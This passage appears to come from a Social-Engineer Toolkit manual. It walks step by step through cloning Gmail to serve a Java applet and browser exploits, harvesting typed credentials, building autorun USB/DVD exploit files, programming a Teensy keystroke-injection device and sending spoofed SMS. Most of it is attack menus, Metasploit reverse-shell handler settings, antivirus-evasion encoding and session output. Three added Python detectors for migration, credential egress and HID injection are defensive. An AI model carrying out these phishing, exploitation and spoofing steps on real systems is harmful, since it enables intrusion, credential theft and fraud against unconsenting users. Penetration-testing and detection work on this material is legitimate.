4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable              Specify a path for your own executable

Enter choice (hit enter for default):
Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: no
Enter the browser exploit you would like to use

1. Internet Explorer CSS Tags Memory Corruption
2. Sun Java Runtime New Plugin docbase Buffer Overflow
3. Microsoft Windows WebDAV Application DLL Hijacker
4. Adobe Shockwave rcsL Memory Corruption Exploit
5. Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
6. Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
7. Microsoft Help Center XSS and Command Execution (MS10-042)
8. Microsoft Internet Explorer iepeers.dll Use After Free (MS10-018)
9. Microsoft Internet Explorer Tabular Data Control Exploit (MS10-018)
10. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
11. Microsoft Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
12. Microsoft Internet Explorer Style getElementsbyTagName Corruption (MS09-072)
13. Microsoft Internet Explorer isComponentInstalled Overflow
14. Microsoft Internet Explorer Explorer Data Binding Corruption (MS08-078)
15. Microsoft Internet Explorer Unsafe Scripting Misconfiguration
16. FireFox 3.5 escape Return Value Memory Corruption
17. Metasploit Browser Autopwn (USE AT OWN RISK!)

Enter your choice (1-17) (enter for default): 8
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
[metasploit ASCII art banner]
       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use windows/browser/ms09_002_memory_corruption
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
LHOST => 172.16.32.129
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set URIPATH /
URIPATH => /
resource (src/program_junk/meta_config)> set SRVPORT 8080
SRVPORT => 8080
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
Now that we have everything running, let's browse to the website and see what's there. We are first greeted with a "site has been moved" page:
We click the link and are hit with a Metasploit exploit; look at the handler on the backend:

[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption to 172.16.32.131:1329...
msf exploit(ms09_002_memory_corruption) >
This exploit fails because we are using Internet Explorer 6. Once it fails, check out the victim's screen:
We hit Run, and we have a Meterpreter shell. In this instance we would be redirected back to the original Google site because the attack was successful. Notice also that when using the Java Applet we automatically migrate to a separate process, which happens to be notepad.exe. The reason is that if the victim closes the browser we are safe: the browser exiting won't terminate our Meterpreter shell.
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:33:20 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
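The migration shown above leaves a very specific trail on the victim: a Java runtime spawns notepad.exe and then creates a thread inside it. The following is an added detection example, not code from the SET manual or from Metasploit. The events are constructed, Sysmon-style records (process creation and remote-thread creation), and the parent and child lists are assumptions a deployment would tune to its own baseline.

```python
"""Detect the process migration shown in the Meterpreter transcript above.

Added example; it is not part of the SET manual or of Metasploit. The
events below are constructed, Sysmon-style records (process creation and
remote-thread creation), and the parent/child lists are assumptions a
deployment would tune. Two behaviours are flagged: a browser or Java
runtime spawning a host process such as notepad.exe, and a remote thread
created from that parent into the child, which is how 'migrate -f' moves
the implant out of java.exe.
"""

# Processes that normally host web content and should not launch arbitrary
# programs (assumed list).
CONTENT_HOSTS = {"java.exe", "javaw.exe", "iexplore.exe", "firefox.exe"}

# Children that a content host has no business starting (assumed list).
UNUSUAL_CHILDREN = {"notepad.exe", "svchost.exe", "rundll32.exe", "explorer.exe"}


def basename(image_path):
    """Lower-cased file name of a Windows image path."""
    return image_path.rsplit("\\", 1)[-1].lower()


def detect_migration(events):
    """Return alert strings for a list of event dicts.

    Event shapes (constructed to mirror Sysmon event IDs 1 and 8):
      {"id": 1, "pid": int, "image": str, "parent_pid": int, "parent_image": str}
      {"id": 8, "source_pid": int, "source_image": str,
                "target_pid": int, "target_image": str}
    """
    alerts = []
    unusual_spawn = {}  # child pid -> parent pid, for spawns that already looked odd

    for ev in events:
        if ev["id"] == 1:
            parent = basename(ev["parent_image"])
            child = basename(ev["image"])
            if parent in CONTENT_HOSTS and child in UNUSUAL_CHILDREN:
                unusual_spawn[ev["pid"]] = ev["parent_pid"]
                alerts.append(
                    f"unusual spawn: {parent} ({ev['parent_pid']}) -> "
                    f"{child} ({ev['pid']})"
                )
        elif ev["id"] == 8:
            source = basename(ev["source_image"])
            target = basename(ev["target_image"])
            if source in CONTENT_HOSTS:
                # A remote thread from a content host is suspicious on its own;
                # into a process that host just spawned, it is the migration pattern.
                followup = unusual_spawn.get(ev["target_pid"]) == ev["source_pid"]
                alerts.append(
                    f"remote thread: {source} ({ev['source_pid']}) -> "
                    f"{target} ({ev['target_pid']})"
                    + (" [migration into own child]" if followup else "")
                )
    return alerts


# Constructed events mirroring the transcript: java.exe (824) spawns
# notepad.exe (3044) and then injects into it. Benign lines are mixed in.
SAMPLE_EVENTS = [
    {"id": 1, "pid": 824, "image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "parent_pid": 1500, "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"id": 1, "pid": 2200, "image": r"C:\Windows\notepad.exe",
     "parent_pid": 1200, "parent_image": r"C:\Windows\explorer.exe"},  # user opened Notepad
    {"id": 1, "pid": 3044, "image": r"C:\Windows\System32\notepad.exe",
     "parent_pid": 824, "parent_image": r"C:\Program Files\Java\jre6\bin\java.exe"},
    {"id": 8, "source_pid": 824, "source_image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "target_pid": 3044, "target_image": r"C:\Windows\System32\notepad.exe"},
]


def run_sample():
    """Alerts for the constructed sample; used by the stand-alone run below."""
    return detect_migration(SAMPLE_EVENTS)


if __name__ == "__main__":
    for line in run_sample():
        print(line)
```

The second rule is the one worth keeping even when the first is noisy: a user opening Notepad from Explorer produces no alert, but a content-hosting process that creates a thread in another process is rare enough in a desktop fleet to page on.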
Let's say that this attack failed and the user hit Cancel. They would then be prompted to enter their username and password into the username/password fields:
[*] WE GOT A HIT! Printing the output:
PARAM: ltmpl=default
PARAM: ltmplcache=2
PARAM: continue=https://mail.google.com/mail/?ui=html
PARAM: zy=l
PARAM: service=mail
PARAM: rm=false
PARAM: dsh=-8578216484479049837
PARAM: ltmpl=default
PARAM: ltmpl=default
PARAM: scc=1
PARAM: ss=1
PARAM: timeStmp=
PARAM: secTok=
PARAM: GALX=fYQL_bXkbzU
POSSIBLE USERNAME FIELD FOUND: Email=thisismyusername
POSSIBLE PASSWORD FIELD FOUND: Passwd=thisismypassword
PARAM: rmShown=1
PARAM: signIn=Sign+in
PARAM: asts=
[*] WHEN YOUR FINISHED. HIT CONTROL-C TO GENERATE A REPORT
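The harvester output above shows what a cloned login page receives: an ordinary form POST whose field names (Email, Passwd) give the credentials away. A web proxy or egress sensor can use the same field-name heuristic in reverse, alerting when a password-bearing POST leaves for a host that is not a known login endpoint. This is an added example, not SET code; the request records and the allow-list are constructed, and the attacker-side host reuses the IP from this manual's walkthrough.

```python
"""Flag credential submissions to hosts that should never receive them.

Added example; it is not part of SET. The request records and the
allow-list are constructed. A POST is flagged when its urlencoded body
carries a password-like field and its host is outside the set of hosts
where that credential is expected to go. Field values are never copied
into an alert, so the sensor does not become a second credential store.
"""
from urllib.parse import parse_qsl

PASSWORD_HINTS = ("passwd", "password", "pwd", "pass")
USERNAME_HINTS = ("email", "user", "login", "account")


def classify_fields(body):
    """Return (username_field, password_field) names found in a urlencoded body.

    Either element is None when no field name matches its hint list.
    """
    username = password = None
    for name, _value in parse_qsl(body, keep_blank_values=True):
        lname = name.lower()
        if password is None and any(h in lname for h in PASSWORD_HINTS):
            password = name
        elif username is None and any(h in lname for h in USERNAME_HINTS):
            username = name
    return username, password


def find_credential_egress(requests, allowed_login_hosts):
    """Return one alert dict per POST that carries a password field to a host
    outside allowed_login_hosts."""
    alerts = []
    for req in requests:
        if req["method"] != "POST":
            continue
        if "application/x-www-form-urlencoded" not in req.get("content_type", ""):
            continue
        username, password = classify_fields(req["body"])
        if password is None:
            continue
        host = req["host"].split(":", 1)[0].lower()  # drop any :port
        if host in allowed_login_hosts:
            continue
        alerts.append({"host": host, "path": req["path"],
                       "username_field": username, "password_field": password})
    return alerts


# Constructed sample: one legitimate sign-in, one POST to the cloned page
# served from the attacker IP used in this manual, one non-credential form.
SAMPLE_REQUESTS = [
    {"method": "POST", "host": "accounts.google.com", "path": "/ServiceLoginAuth",
     "content_type": "application/x-www-form-urlencoded",
     "body": "Email=thisismyusername&Passwd=thisismypassword&signIn=Sign+in"},
    {"method": "POST", "host": "172.16.32.129:8080", "path": "/",
     "content_type": "application/x-www-form-urlencoded",
     "body": "ltmpl=default&Email=thisismyusername&Passwd=thisismypassword&signIn=Sign+in"},
    {"method": "POST", "host": "intranet.example", "path": "/search",
     "content_type": "application/x-www-form-urlencoded",
     "body": "q=quarterly+report"},
]
ALLOWED_LOGIN_HOSTS = {"accounts.google.com"}  # constructed allow-list


def run_sample():
    return find_credential_egress(SAMPLE_REQUESTS, ALLOWED_LOGIN_HOSTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

In a real deployment the allow-list is per brand (a Google-looking form should only ever post to Google hosts), and the alert is the trigger to reset the account, since the user has by then already typed the password into the clone.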
Infectious Media Generator
1. File-Format Exploits
2. Standard Metasploit Executable

Enter your numeric choice (return for default): 1

Enter the IP address for the reverse connection (payload): 172.16.32.129

Select the file format exploit you want.
The default is the PDF embedded EXE.

********** PAYLOADS **********

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 1

1. Windows Reverse TCP Shell               Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL                 Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)         Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)   Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)            Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default):
[*] Windows Meterpreter Reverse TCP selected.
Enter the port to connect back on (press enter for default):
[*] Defaulting to port 443...
[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Started reverse handler on 172.16.32.129:443
[*] Creating 'template.pdf' file...
[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
[*] Payload creation complete.
[*] All payloads get sent to the src/program_junk/template.pdf directory
[*] Payload generation complete. Press enter to continue.
[*] Your attack has been created in the SET home directory folder "autorun"
[*] Copy the contents of the folder to a CD/DVD/USB to autorun.

Do you want to create a listener right now yes or no: yes
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***

[metasploit ASCII art banner]
resource (/pentest/exploits/set/src/program_junk/meta_config)> use multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lhost 172.16.32.129
lhost => 172.16.32.129
resource (/pentest/exploits/set/src/program_junk/meta_config)> set lport 443
lport => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 172.16.32.129:443
[*] Starting the payload handler...
In this example we specified a file format attack in order to create the infectious USB/DVD/CD. A folder called SET is created in the root of the SET directory that contains the components you will need to copy over to the media device of your choosing. Once inserted, the file format exploit would trigger an overflow and, if the target were susceptible, it would completely compromise their system with a Meterpreter shell. If we had selected the executable option instead, it would have followed the same avenues as previously walked through in this chapter, but instead of triggering an exploit it would run an executable. When doing an ls -al in the SET directory you should notice that there is an autorun folder. Burn the contents of that directory to a DVD or write it to a USB device. Once inserted you would be presented with a shell:
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:42:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
Teensy USB HID Attack Vector
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8 Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 6
Welcome to the Teensy HID Attack Vector.

Special thanks to: IronGeek and WinFang

The Teensy HID Attack Vector utilizes the teensy USB device to program the device to act as a keyboard. Teensy's have onboard storage and can allow for remote code execution on the physical system. Since the devices are registered as USB Keyboard's it will bypass any autorun disabled or endpoint protection on the system.

You will need to purchase the Teensy USB device, it's roughly $22 dollars. This attack vector will auto generate the code needed in order to deploy the payload on the system for you.

This attack vector will create the .pde files necessary to import into Arduino (the IDE used for programming the Teensy). The attack vectors range from Powershell based downloaders, wscript attacks, and other methods.

For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle

To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Select a payload to create the pde file to import into Arduino:

1. Powershell HTTP GET MSF Payload
2. WSCRIPT HTTP GET MSF Payload
3. Powershell based Reverse Shell
4. Return to the main menu.

Enter your choice: 2

Do you want to create a payload and listener yes or no: yes
What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable              Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] PDE file created. You can get it under 'reports/teensy.pde'
[*] Be sure to select "Tools", "Board", and "Teensy 2.0 (USB/KEYBOARD)" in Arduino
Press enter to continue.
[*] Launching MSF Listener...
[*] This may take a few to load MSF...
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *
       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 300 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r10268 updated today (2010.09.09)

resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
Now that we have everything ready, SET exports a file called teensy.pde to the reports/ folder. Copy that reports folder to wherever you have Arduino installed. For this attack, follow the instructions at PJRC on how to upload your code to the Teensy board; it's relatively simple, you just need to install the Teensy Loader and the Teensy libraries. Once you do that you will have an IDE interface called Arduino. One of the MOST important aspects of this is to ensure you set your board to a Teensy USB Keyboard/Mouse. Once you have this selected, drag your pde file into the Arduino interface. Arduino/Teensy supports Linux, OSX, and Windows. Insert your USB device into the computer and upload your code. This will program your device with the SET generated code. Below is the upload and the code. Once the USB device is inserted on the victim machine and has finished running, you should be presented with a Meterpreter shell:
[*] Sending stage (748544 bytes) to 172.16.32.131
[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1333) at Thu Sep 09 12:52:32 -0400 2010
[*] Session ID 1 (172.16.32.129:443 -> 172.16.32.131:1333) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: java.exe (824)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3044
[*] New server process: notepad.exe (3044)
msf exploit(ms09_002_memory_corruption) >
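The Teensy walkthrough above works because the device enrolls as an ordinary USB keyboard, so disabled autorun and file-based endpoint protection never get a say. What an endpoint sensor can see is a new HID keyboard appearing and then typing far faster and more regularly than any person. The following is an added example, not SET code or Teensy firmware: it consumes a constructed event stream of device enumerations and keystroke timestamps, and the grace period, burst size and timing threshold are assumptions a deployment would tune.

```python
"""Spot keystroke injection from a freshly enumerated USB keyboard.

Added example; it is not part of SET or of the Teensy firmware. The
event stream and thresholds below are constructed assumptions. A device
is flagged when it was enumerated recently and a burst of its keystrokes
arrives with a median inter-key gap well below human typing speed. A
legitimately plugged-in keyboard typed by a person stays under the radar
because its gaps are an order of magnitude longer.
"""
from statistics import median

NEW_DEVICE_GRACE_S = 10.0    # a keyboard counts as "new" this long after enumeration
BURST_KEYS = 20              # keystrokes examined per decision
MAX_MEDIAN_GAP_S = 0.030     # 30 ms median between keys is far below human typing


def detect_injection(events):
    """events: (timestamp_s, kind, device_id) tuples, kind in {'hid_added', 'key'}.

    Returns a list of (timestamp_s, device_id) alerts, at most one per device.
    """
    added_at = {}      # device_id -> time it was enumerated
    key_times = {}     # device_id -> timestamps of its keystrokes
    alerted = set()
    alerts = []

    for ts, kind, device in sorted(events):
        if kind == "hid_added":
            added_at[device] = ts
            key_times[device] = []
            continue
        if kind != "key" or device in alerted:
            continue
        times = key_times.setdefault(device, [])
        times.append(ts)
        if len(times) < BURST_KEYS:
            continue
        window = times[-BURST_KEYS:]
        gaps = [later - earlier for earlier, later in zip(window, window[1:])]
        burst_is_new = (device in added_at
                        and window[0] - added_at[device] <= NEW_DEVICE_GRACE_S)
        if burst_is_new and median(gaps) < MAX_MEDIAN_GAP_S:
            alerts.append((ts, device))
            alerted.add(device)
    return alerts


def constructed_stream():
    """Built-in keyboard typing at human speed, then a Teensy-like device."""
    events = [(0.0, "hid_added", "usb-kbd-builtin")]
    # A person typing: ~180 ms between keys, starting long after enumeration.
    events += [(100.0 + i * 0.18, "key", "usb-kbd-builtin") for i in range(30)]
    # New device enumerates and starts typing 8 ms apart half a second later.
    events.append((200.0, "hid_added", "usb-hid-teensy"))
    events += [(200.5 + i * 0.008, "key", "usb-hid-teensy") for i in range(40)]
    return events


def run_sample():
    return detect_injection(constructed_stream())


if __name__ == "__main__":
    for ts, dev in run_sample():
        print(f"{ts:.3f}s keystroke injection from {dev}")
```

The alert fires on the twentieth injected keystroke, which is early enough to lock the session before a typed-out downloader finishes. Policy tools such as USBGuard can complement this by refusing to authorize a second keyboard at all on machines that never need one.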
SMS Spoofing Attack Vector
1. SMS Attack Single Phone Number
2. SMS Attack Mass SMS
3. Return to SMS Spoofing Menu

Enter your choice: 1

Single SMS Attack
Enter who you want to send sms to: 5555555555

Do you want to use a predefined template or craft a one time SMS.

1. Pre-Defined Template
2. One-Time Use SMS
3. Cancel and return to SMS Spoofing Menu

Enter your choice: 1

Below is a list of available templates:

1: MRW: pedido no entregado
2: Boss Fake
3: Movistar: publicidad nokia gratis
4: Movistar: publicidad tarifa llamada
5: TMB: temps espera
6: Movistar: publicidad ROCKRIO
7: Movistar: publicidad verano internet
8: Vodafone Fool
9: Police Fake
10: Movistar: publicidad navidad
11: Yavoy: regalo yavoy
12: Movistar: oferta otoño
13: Movistar: publicidad tarifa sms
14: teabla: moviles gratis
15: Movistar: publicidad aramon
16: Movistar: publicidad nieve
17: Vodafone: publicidad nuevo contrato
18: ruralvia: confirmacion de transferencia
19: Ministerio vivienda: incidencia pago
20: Tu Banco: visa disponible en oficina

Enter the number you want to use: 2

Service Selection

There are diferent services you can use for the SMS spoofing, select your own.
What do you want to do:

1. SohoOS (buggy)
2. Lleida.net (pay)
3. SMSGANG (pay)
4. Android Emulator (need to install Android Emulator)
5. Cancel and return to SMS Spoofing Menu

Enter your choice: 1

SMS sent
SET has completed.
SET Automation
SET has a feature called set-automate which takes an answer file (explained in a moment) and enters the commands in menu mode for you. In the prior walkthroughs you had to step through each menu every time you prepared the attack. For example, if I wanted to do the Java Applet attack I would do this:
1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious Media Generator
4. Create a Payload and Listener
5. Mass Mailer Attack
6. Teensy USB HID Attack Vector
7. SMS Spoofing Attack Vector
8 Update the Metasploit Framework
9. Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 2
The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Enter what type of attack you would like to utilize.

The Java Applet attack will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.

The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER's in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src="http://YOURIP/">. This could either be from a compromised site or through XSS.

The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

1. The Java Applet Attack Method
2. The Metasploit Browser Exploit Method
3. Credential Harvester Attack Method
4. Tabnabbing Attack Method
5. Man Left in the Middle Attack Method
6. Web Jacking Attack Method
7. Multi-Attack Web Method
8. Return to the previous menu

Enter your choice (press enter for default): 1
The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu

Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: https://gmail.com
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: 8J5ovr0lC9tW
[*] Malicious java applet website prepped for deployment

What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
9. Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
10. Windows Meterpreter Reverse DNS        Tunnel communications over DNS and spawn a Meterpreter console
11. Import your own executable             Specify a path for your own executable

Enter choice (hit enter for default):

Below is a list of encodings to try and bypass AV.
Select one of the below, 'backdoored executable' is typically the best.

1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.

********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************

Enter choice yes or no: no
Looking through the options, we selected:

1
2
1
https://gmail.com
no

If you create a text file called moo.txt (or whatever name you want) and put those answers into it, you can call set-automate and it will enter them for you each time.
root@bt:/pentest/exploits/set# ./set-automate moo.txt
[*] Spawning SET in a threaded process...
[*] Sending command 1 to the interface...
[*] Sending command 2 to the interface...
[*] Sending command 1 to the interface...
[*] Sending command https://gmail.com to the interface...
[*] Sending command default to the interface...
[*] Sending command default to the interface...
[*] Sending command default to the interface...
[*] Sending command no to the interface...
[*] Sending command default to the interface...
[*] Finished sending commands, interacting with the interface..
SET Web-Interface
The web interface for the Social-Engineer Toolkit takes whatever you select and generates an answer file that is ultimately fed into set-automate. Each response is assigned a given value, and the built-in logic on the back-end parses your responses to build and craft the attack in SET. To start the web interface, simply type ./set-web:

root@bt:/pentest/exploits/set# ./set-web
[*] Starting the SET Command Center on port: 44444
 ______________________________________________________
|                                                      |
|             The Social-Engineer Toolkit              |
|                    Command Center                    |
|                                                      |
|               May the pwn be with you                |
|______________________________________________________|
All results from the web interface will be displayed in this terminal.
[*] Interface is bound to http://127.0.0.1 on port 44444 (open browser to ip/port)
